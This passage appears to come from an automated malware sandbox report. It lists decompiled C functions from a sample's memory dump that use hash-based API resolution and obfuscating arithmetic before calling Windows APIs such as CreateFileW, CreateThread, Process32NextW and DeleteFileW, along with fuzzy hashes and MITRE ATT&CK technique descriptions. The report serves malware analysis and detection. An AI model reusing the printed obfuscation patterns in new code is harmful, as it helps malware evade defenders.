				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002407A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00244f80
0x00244f81
0x00244f82
0x00244f86
0x00244f87
0x00244f8c
0x00244fa5
0x00244fa8
0x00244faf
0x00244fb6
0x00244fc7
0x00244fca
0x00244fd7
0x00244fe2
0x00244fe7

APIs

CloseHandle.KERNEL32(003E66D8), ref: 00244FE2

Strings

{#lm, xrefs: 00244FC2

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction ID: d9e351559df2f839ea3f993d8248c07b88d719110bbe9f1616a24110082f9faf
Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
Instruction Fuzzy Hash: 8FF037B082120CFFDB08DFA4D98689EBFBAEB40300F208199E804AB250D3715B509B51

Uniqueness

Uniqueness Score: -1.00%

Function 0024375D, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0024375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				int _t42;
				signed int _t43;

				_push(_a52);
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(0);
				E0023602B(_t35);
				_v28 = 0x6b2c80;
				_v24 = 0x4fb02;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0xe6a1;
				_v8 = _v8 ^ 0xa0873718;
				_v8 = _v8 + 0xffffab24;
				_v8 = _v8 ^ 0x2595dee0;
				_v8 = _v8 ^ 0x8512f71c;
				_v12 = 0x8058;
				_t43 = 5;
				_v12 = _v12 / _t43;
				_v12 = _v12 ^ 0x000051c4;
				E002407A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
				return _t42;
			}

0x00243764
0x00243769
0x0024376a
0x0024376d
0x0024376e
0x00243771
0x00243774
0x00243775
0x00243778
0x0024377b
0x0024377e
0x00243781
0x00243782
0x00243784
0x00243785
0x0024378a
0x00243794
0x0024379d
0x002437a0
0x002437a3
0x002437aa
0x002437b1
0x002437b8
0x002437bf
0x002437c6
0x002437d2
0x002437da
0x002437e2
0x002437f6
0x0024380a
0x00243810

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0024380A

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction ID: 3232b78bbb0df6b002b6d57ac38bd0404d5aab1a6b021c0c34f8ccecd4d8497e
Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
Instruction Fuzzy Hash: C51117B1812219BBCF55DF95DD0A8DF7EB9EF49360F108048F90862160C3B14A64DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0023B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0023B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0023602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002407A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

APIs

CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 0023B5FD

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction ID: ae4d34fd2688908d7b37844e0c7cd486ab6290dc1b62701abbb9e3509a401dc7
Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
Instruction Fuzzy Hash: E911C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB51

Uniqueness

Uniqueness Score: -1.00%

Function 002436D3, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E002436D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t23;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				signed int _t34;
				void* _t41;

				_t41 = __edx;
				_t32 = __ecx;
				E0023602B(_t23);
				_v28 = 0x12ca0f;
				asm("stosd");
				asm("stosd");
				_t34 = 0x2d;
				asm("stosd");
				_v8 = 0xdb27;
				_v8 = _v8 >> 9;
				_v8 = _v8 / _t34;
				_v8 = _v8 ^ 0x000020cb;
				_v12 = 0x489;
				_v12 = _v12 | 0x46cddb89;
				_v12 = _v12 ^ 0x46cde771;
				_t30 = E002407A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
				return _t31;
			}

0x002436df
0x002436e1
0x002436e8
0x002436ed
0x002436fc
0x00243701
0x00243702
0x00243709
0x0024370a
0x00243711
0x0024371b
0x00243723
0x0024372f
0x00243736
0x0024373d
0x0024374a
0x00243754
0x0024375c

APIs

ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00243754

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction ID: b45b3a351a787b6938aa58a2ee0a5ce5a4ab589055b2415b48da980828501484
Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
Instruction Fuzzy Hash: B4019675A01208FBEB04DBA9DC469DFFF74EF44364F108055E604A7251D7715F148BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00231132, Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00231132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
				unsigned int _v8;
				signed int _v12;
				void* _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E0023602B(_t27);
				_v12 = 0xe2c5;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 | 0x070d55ff;
				_v12 = _v12 ^ 0x071f7e34;
				_v8 = 0x91c3;
				_v8 = _v8 + 0xffff5023;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x7e1e17b8;
				E002407A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
				return _t33;
			}

0x00231135
0x00231136
0x0023113a
0x0023113b
0x0023113e
0x00231141
0x00231144
0x00231147
0x0023114a
0x0023114b
0x0023114e
0x0023114f
0x00231150
0x00231151
0x00231156
0x0023116f
0x00231172
0x00231179
0x00231180
0x00231187
0x0023118e
0x00231192
0x00231195
0x002311a8
0x002311ba
0x002311c0

APIs

CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 002311BA

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction ID: ebd1b1779c1ee27fdd2632410356df3a92941058f44d4dfcce95fa1a27d09999
Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
Instruction Fuzzy Hash: 1D012772802219BBCF15DFE5CD4ACCFBFB9EF09254F104188FA0962250D2729A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0024981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0024981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002407A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,002387F2,0000CAAE,0000510C,AD82F196), ref: 0024989B

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction ID: 5c104816d0916b2f742d7da5e2f5af63a7c104f2388a3feb003ea95f8739dd8b
Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
Instruction Fuzzy Hash: 78015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00249AC7, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00249AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t26;
				int _t33;
				signed int _t35;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0023602B(_t26);
				_v12 = 0x3a37;
				_t35 = 0x5f;
				_v12 = _v12 / _t35;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x0000271a;
				_v8 = 0x41ad;
				_v8 = _v8 ^ 0xae17da57;
				_v8 = _v8 + 0xffff40f3;
				_v8 = _v8 ^ 0xae16a338;
				E002407A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
				_t33 = Process32NextW(_a12, _a4); // executed
				return _t33;
			}

0x00249acc
0x00249acf
0x00249ad2
0x00249ad7
0x00249adf
0x00249aed
0x00249af5
0x00249afd
0x00249b01
0x00249b08
0x00249b0f
0x00249b16
0x00249b1d
0x00249b31
0x00249b3f
0x00249b44

APIs

Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00249B3F

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction ID: e3a657b15bc0928da0d8b432b532dc8f99efe31fb5ff8a7772495ec4eec08123
Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
Instruction Fuzzy Hash: 3E014BB1910208BFEF08DFA4CC4A8AEBFB5EF44350F108098F509A6291D7B25B609F51

Uniqueness

Uniqueness Score: -1.00%

Function 00237663, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00237663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				intOrPtr* _t26;
				void* _t27;

				E0023602B(_t22);
				_v12 = 0xe6d;
				_v12 = _v12 | 0x830368b1;
				_v12 = _v12 ^ 0x83037da7;
				_v8 = 0xe4f2;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xc9e423b1;
				_t26 = E002407A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
				return _t27;
			}

0x00237678
0x0023767d
0x00237687
0x00237693
0x0023769a
0x002376a1
0x002376a5
0x002376a9
0x002376c2
0x002376d5
0x002376da

APIs

QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,0023620E,00000000,?,?), ref: 002376D5

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction ID: 489d3fd94c13363bbd2b9fddb1c3a5342f45085022bca445581fc237041dc55b
Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
Instruction Fuzzy Hash: 32014B7591020CBFEF059F90CC06AAEBF75EB44700F108188FA1426261D2729A609B50

Uniqueness

Uniqueness Score: -1.00%

Function 0024AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002407A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0024aa3f
0x0024aa40
0x0024aa41
0x0024aa44
0x0024aa47
0x0024aa4b
0x0024aa4c
0x0024aa51
0x0024aa5b
0x0024aa64
0x0024aa68
0x0024aa6f
0x0024aa76
0x0024aa8d
0x0024aa90
0x0024aa9d
0x0024aaa8
0x0024aaad

APIs

DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0024AAA8

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction ID: d30233234a1f3f2a51f3f54581c7389b96fb4482909fd5c53c65e4e98134fc17
Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
Instruction Fuzzy Hash: BBF069B191020CFFDF08DF94DD4A89EBFB8EB40304F108088F905A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00249A56, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00249A56(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				void* _t29;

				_t29 = __ecx;
				E0023602B(_t18);
				_v12 = 0x9a38;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x00004339;
				_v8 = 0x299d;
				_v8 = _v8 + 0xa1ce;
				_v8 = _v8 | 0xc5f89a67;
				_v8 = _v8 + 0x125d;
				_v8 = _v8 ^ 0xc5f8b599;
				_t22 = E002407A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
				return _t23;
			}

0x00249a5f
0x00249a63
0x00249a68
0x00249a72
0x00249a7b
0x00249a82
0x00249a89
0x00249a90
0x00249a97
0x00249a9e
0x00249ab7
0x00249ac0
0x00249ac6

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00249AC0

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction ID: 1b2c2b387126502ec1fbb95effe8940f590b012507124353048e30248ac58de3
Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
Instruction Fuzzy Hash: BDF037B1911218FFEB08DB94D94A8DEBAB8EF41314F108088F40466241E7B51F648BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00235FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00235FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002407A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00235fb5
0x00235fb6
0x00235fb7
0x00235fbb
0x00235fbc
0x00235fc1
0x00235fcb
0x00235fd7
0x00235fde
0x00235fe5
0x00235ffc
0x00235fff
0x00236006
0x0023600d
0x0023601a
0x00236025
0x0023602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00236025

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction ID: 98202d1760a7fff82657aed4a5d7fd5f1196688f7f282afeb6b2d7103732bb22
Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
Instruction Fuzzy Hash: B0F04FB0C11208FFDB08DFA0E94789EBFB8EB40300F208198E509A7260E7715F559F55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

